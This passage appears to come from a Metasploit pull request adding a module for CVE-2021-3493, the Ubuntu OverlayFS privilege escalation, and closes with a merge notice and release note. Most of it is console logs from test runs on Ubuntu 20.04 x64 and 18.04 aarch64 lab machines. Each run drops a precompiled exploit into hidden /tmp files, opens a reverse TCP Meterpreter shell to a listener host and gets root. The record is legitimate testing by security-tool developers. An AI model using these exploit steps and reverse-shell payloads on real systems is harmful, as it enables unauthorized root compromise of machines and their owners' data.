  1         meterpreter x64/linux  msfuser @ 10.5.132.102  10.5.135.101:5482 -> 10.5.132.102:45760  (10.5.132.102)

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > reload
[*] Reloading module...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.H8nM0H3ie
[*] /tmp/.H8nM0H3ie created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.H8nM0H3ie/.ZFgkI' (17840 bytes) ...
[*] Writing '/tmp/.H8nM0H3ie/.EDNNcM' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.H8nM0H3ie/.ZFgkI /tmp/.H8nM0H3ie/.EDNNcM /tmp/.H8nM0H3ie Z0pVs2EPI
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.H8nM0H3ie/.ZFgkI
[*] Meterpreter session 6 opened (10.5.135.101:4444 -> 10.5.132.102:58106 ) at 2021-12-02 09:34:47 -0600
[*] 

meterpreter > getuid
Server username: root

Linux 20.04 With Python Payload

msf6 payload(python/meterpreter/reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                      Information                Connection
  --  ----  ----                      -----------                ----------
  7         meterpreter python/linux  msfuser @ ubuntu-20042x64  10.5.135.101:6525 -> 10.5.132.102:56584  (10.5.132.102)

msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 7
session => 7
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.raA6uMftVZ
[*] /tmp/.raA6uMftVZ created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.raA6uMftVZ/.AXAd9qKt' (17840 bytes) ...
[*] Writing '/tmp/.raA6uMftVZ/.fEKlyT38zg' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.raA6uMftVZ/.AXAd9qKt /tmp/.raA6uMftVZ/.fEKlyT38zg /tmp/.raA6uMftVZ nDG0QFg1Dx
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.raA6uMftVZ/.AXAd9qKt
[*] Meterpreter session 8 opened (10.5.135.101:4444 -> 10.5.132.102:58172 ) at 2021-12-02 09:44:16 -0600
[*] 
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.

^C[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer     : 10.5.132.102
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

Linux 18.04 aarch64

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                       Information                Connection
  --  ----  ----                       -----------                ----------
  7         meterpreter python/linux   msfuser @ ubuntu-20042x64  10.5.135.101:6525 -> 10.5.132.102:56584  (10.5.132.102)
  9         meterpreter aarch64/linux  msfuser @ 192.168.122.36   10.5.135.101:5424 -> 10.5.132.107:46520  (::1)

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
session => 9
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set target aarch64 
target => aarch64
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION  9                yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   aarch64


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set payload linux/aarch64/meterpreter
set payload linux/aarch64/meterpreter/reverse_tcp    set payload linux/aarch64/meterpreter_reverse_https
set payload linux/aarch64/meterpreter_reverse_http   set payload linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set payload linux/aarch64/meterpreter/reverse_tcp 
payload => linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["4.15.0", "135", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 135
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.C13Fb2Ika
[*] /tmp/.C13Fb2Ika created
[*] Detected architecture: aarch64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.aarch64.elf on system...
[*] Writing '/tmp/.C13Fb2Ika/.n1Sc4o7F5' (14288 bytes) ...
[*] Writing '/tmp/.C13Fb2Ika/.jKFExJKlb' (332 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.C13Fb2Ika/.n1Sc4o7F5 /tmp/.C13Fb2Ika/.jKFExJKlb /tmp/.C13Fb2Ika KYaOsFfj
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (920356 bytes) to 10.5.132.107
[+] Deleted /tmp/.C13Fb2Ika/.n1Sc4o7F5
[*] Meterpreter session 10 opened (10.5.135.101:4444 -> 10.5.132.107:58642 ) at 2021-12-02 09:49:00 -0600
[*] 

meterpreter > getuid
Server username: root

@dwelch-r7 dwelch-r7 merged commit 12b4274 into rapid7:master Dec 2, 2021
@dwelch-r7
Contributor

Release Notes

Adds a module for the CVE-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 - 20.10

Labels
docs module rn-modules release notes for new or majorly enhanced modules